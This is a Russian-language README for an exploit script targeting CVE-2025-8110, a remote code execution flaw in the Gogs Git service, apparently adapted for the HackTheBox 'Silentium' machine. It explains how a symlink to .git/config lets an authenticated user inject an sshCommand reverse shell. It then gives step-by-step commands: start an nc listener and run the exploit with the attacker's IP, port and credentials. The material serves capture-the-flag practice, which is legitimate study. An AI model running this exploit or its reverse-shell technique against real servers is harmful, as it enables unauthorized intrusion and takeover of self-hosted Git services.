
CVE-2025-8110 Специально для бокса Silentium на HTB.
Отказ от ответственности: Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение. Используйте его только против систем, на которые у вас есть явное разрешение.
Это модифицированная версия zAbuQasem/gogs-CVE-2025-8110, адаптированная для работы против машины Silentium на HackTheBox. Оригинальный PoC требовал корректировок для обработки специфической конфигурации Gogs и потока аутентификации Silentium.
CVE-2025-8110 — это уязвимость удаленного выполнения кода в Gogs, самостоятельно размещаемом Git-сервисе.
Конечная точка API обновления файлов Gogs (PUT /api/v1/repos/.../contents/<file>) не проверяет, является ли целевой файл символической ссылкой. Аутентифицированный злоумышленник может поместить симлинк в репозиторий, указывающий на .git/config, а затем с помощью API перезаписать его вредоносной полезной нагрузкой. Полезная нагрузка внедряет пользовательский sshCommand в конфигурацию git, который Gogs выполняет на стороне сервера при следующей SSH-операции с этим репозиторием, что приводит к удаленному выполнению кода.
malicious_link -> .git/config) и отправляет его..git/config, содержащий sshCommand = <обратная оболочка>..git/config, запуская оболочку при следующей SSH-операции.Установка зависимостей:
pip install -r requirements.txt
Запустите слушатель:
nc -lvnp <PORT>
Запустите эксплойт:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
Опционально — маршрутизация через Burp Suite:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| Флаг | Описание |
|---|---|
-u | Базовый URL Gogs |
-lh | Ваш IP атакующего (хост обратной оболочки) |
-lp | Ваш порт слушателя |
-un | Ваше зарегистрированное имя пользователя Gogs |
-pw | Ваш пароль Gogs |
-x | (Опционально) Маршрутизация трафика через Burp на localhost:8080 |